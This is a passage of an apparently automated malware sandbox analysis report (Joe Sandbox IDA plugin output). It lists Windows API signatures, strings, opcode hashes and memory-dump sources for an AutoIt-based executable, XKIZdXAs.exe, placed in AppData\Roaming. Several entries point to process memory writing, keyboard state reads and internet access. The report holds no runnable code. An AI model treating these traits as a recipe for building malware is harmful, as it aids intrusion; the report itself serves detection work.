                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID: !$asin
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem
                                                                          • String ID: P
                                                                          Similarity
                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                          • String ID: U
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateObjectStock
                                                                          • String ID: SysMonthCal32
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                          • String ID: Listbox
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: %lu
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: msctls_trackbar32
                                                                          Similarity
                                                                          • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                          • String ID: %s%d
                                                                          Similarity
                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                          • String ID: csm
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                          • String ID: 0
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC62DD1), ref: 00007FF7ADC9AF37
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC62DD1), ref: 00007FF7ADC9AF4F
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2267087916-0
                                                                          Similarity
                                                                          • API ID: ErrorLast$socket
                                                                          • String ID:
                                                                          • API String ID: 1881357543-0
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          Similarity
                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                          • String ID:
                                                                          • API String ID: 3076010158-0
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                          • String ID:
                                                                          • API String ID: 4141327611-0
                                                                          Similarity
                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 1083639309-0
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          Similarity
                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                          • String ID:
                                                                          • API String ID: 3340791633-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43DB1
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43E13
                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43E4D
                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7ADC3A27B,?,?,?,00007FF7ADC3A236), ref: 00007FF7ADC43E77
                                                                          Similarity
                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                          • String ID:
                                                                          • API String ID: 1557788787-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID:
                                                                          • API String ID: 847901565-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 837644225-0
                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC02A54: GetWindowLongPtrW.USER32 ref: 00007FF7ADC02A71
                                                                          • GetClientRect.USER32(?,?,?,?,?,00007FF7ADC4AA36,?,?,?,?,?,?,?,?,?,00007FF7ADC027AF), ref: 00007FF7ADCB22C4
                                                                          • GetCursorPos.USER32(?,?,?,?,?,00007FF7ADC4AA36,?,?,?,?,?,?,?,?,?,00007FF7ADC027AF), ref: 00007FF7ADCB22CF
                                                                          • ScreenToClient.USER32 ref: 00007FF7ADCB22DD
                                                                          • DefDlgProcW.USER32(?,?,?,?,?,00007FF7ADC4AA36,?,?,?,?,?,?,?,?,?,00007FF7ADC027AF), ref: 00007FF7ADCB231F
                                                                            • Part of subcall function 00007FF7ADCAE894: LoadCursorW.USER32 ref: 00007FF7ADCAE945
                                                                          Similarity
                                                                          • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1626762757-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _ctrlfp
                                                                          • String ID:
                                                                          • API String ID: 697997973-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 2979156933-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                          • String ID:
                                                                          • API String ID: 1352324309-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 1539411459-0
                                                                          • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                          • Instruction ID: a32b6fc9642b6d1764e148afc6b01220eab454aa534d66db653fa7333bfedd97
                                                                          • Instruction Fuzzy Hash: DE01F536A2D3914AE7005B15B809768EF60FB86F90FD95134CE9903BB1DF7DD8428B10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: gfffffff
                                                                          • API String ID: 3215553584-1523873471
                                                                          • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                          • Instruction ID: 5ea022d283c0111bb856dbf4189e8775e6943ccc5362b119ceafb5e46025197b
                                                                          • Instruction Fuzzy Hash: B1915A62A0E7868AEB19AF25924037CEB55EB257C0F858131DB8D073A5EE7DE153D310
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ContainedObject
                                                                          • String ID: AutoIt3GUI$Container
                                                                          • API String ID: 3565006973-3941886329
                                                                          • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                          • Instruction ID: df8c7ac12b5b473fc01011790bec7fa7eaf935745cd90b0365c353d931063be5
                                                                          • Instruction Fuzzy Hash: B5914932609B4286DB24EF29E4506ADB3A4FB88F84F928136DF8D43724EF39D546C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: e+000$gfff
                                                                          • API String ID: 3215553584-3030954782
                                                                          • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                          • Instruction ID: c8a3eaddf643318eef1f8e57015c718eaa046421f77e2ad8394a09fceb800500
                                                                          • Instruction Fuzzy Hash: AB518C62B1D3C14AE7299F359940369FA91EB80F90FC98231C79C47BE6EE6CD446C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                          • String ID: C:\Users\user\AppData\Roaming\XKIZdXAs.exe
                                                                          • API String ID: 3307058713-1224080508
                                                                          • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                          • Instruction ID: 267802fbd298c3235825144c5bdf6a1549a5c814e77a595612e6ac84aecedefa
                                                                          • Instruction Fuzzy Hash: DC418D32A0EA52CDE719BF21D8400B9F7A5EF44B90BD64031E90E47B65EE7CE5538320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 3467290483-2160076837
                                                                          • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                          • Instruction ID: c0e97fb36f48c194cdc2d6878ce3fcb47fa3fa581b807df7473ca14ba4046852
                                                                          • Instruction Fuzzy Hash: 67411F3250D6C28AD6709F25E4407AEB761F784791F914135EBE903A69EF3CD4829B50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 2496851823-2422070025
                                                                          • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                          • Instruction ID: 7d6a91d6e376482cc0de59e0abfa090b77b1e29a757a641d41b48c3d5813cd10
                                                                          • Instruction Fuzzy Hash: F131CF32A1D64289EB10EB22D85027DB760FB54BA4FD68531EA5E433A1FE3DD5468320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _snwprintf
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                          • API String ID: 3988819677-2584243854
                                                                          • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                          • Instruction ID: 13e3bc2ca88392bbc2ad59719655b212609b6ab496cf0004e62a1070dcb62962
                                                                          • Instruction Fuzzy Hash: E2314F76B0EB0299EB14EB61E4512ECA365FB44784FC24032DA5D177A5EF38E50BC760
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType
                                                                          • String ID: @
                                                                          • API String ID: 3000768030-2766056989
                                                                          • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                          • Instruction ID: 9a17278861ce5882e093f0155a78e5f546b7b77bdf55424a4f6249e2c0e5672d
                                                                          • Instruction Fuzzy Hash: 1F21EA22A1D64245EB685B28A490238F750EB85B74FE61335D66E033F4EEBCD483D320
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                          • Instruction ID: 16e4aa5d13f7d3e8259591f10d1dafb2b7106f76285b42fe2696498fdc784bb2
                                                                          • Instruction Fuzzy Hash: 4E314D32A09781CBD764DF29E44075AB7A5F788750F914239EB9943BA8DB3CE841CF10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                          • Instruction ID: 26bb9e34c6091c099a6b55a856172918179df50a937a045e765214d0dd870a05
                                                                          • Instruction Fuzzy Hash: F3312C36A0DB81CAE770DB15E44475AB7A1F784790FA54235EAA843BA8DF3CD842CF11
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _handle_error
                                                                          • String ID: "$pow
                                                                          • API String ID: 1757819995-713443511
                                                                          • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                          • Instruction ID: ff446f17b71b7cfb12fe9deb45ab3a8044001cc8d17dce8f58e87c695607de5d
                                                                          • Instruction Fuzzy Hash: FD216172D1CEC58BE374DF10E04466AFAA0FBDA344FA11325F68906A65DBBDD1429B10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                          • Instruction ID: caae303b2795d2fa8878d2d793ad7ecd5904b63f499c0170f1cf55edf42486b9
                                                                          • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                          • Instruction Fuzzy Hash: 39110522A0EB8085F710EB11D4401E9A3A0FB99BA0FC54231DAAC477E9EE3CD107CB10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                          • Instruction ID: 5e458eef6f9943aa6bbc0df3556580dff546ccb9a8518ccb625c5bf91e9c3570
                                                                          • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                          • Instruction Fuzzy Hash: 0711C83AE1E64186E7519B11E0007BDA365E780B49FE54035DA8D06AA8EF3EDC83CB10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                          • Instruction ID: d603c7007c112051966a976ee8e9199f7f2a32ac4ba0e04061ab7c5c242d798a
                                                                          • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                          • Instruction Fuzzy Hash: 2611B621A0E68555FF10F710E1512F99360FF85B84FC55130D68D476AAFE2CD206CB20
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
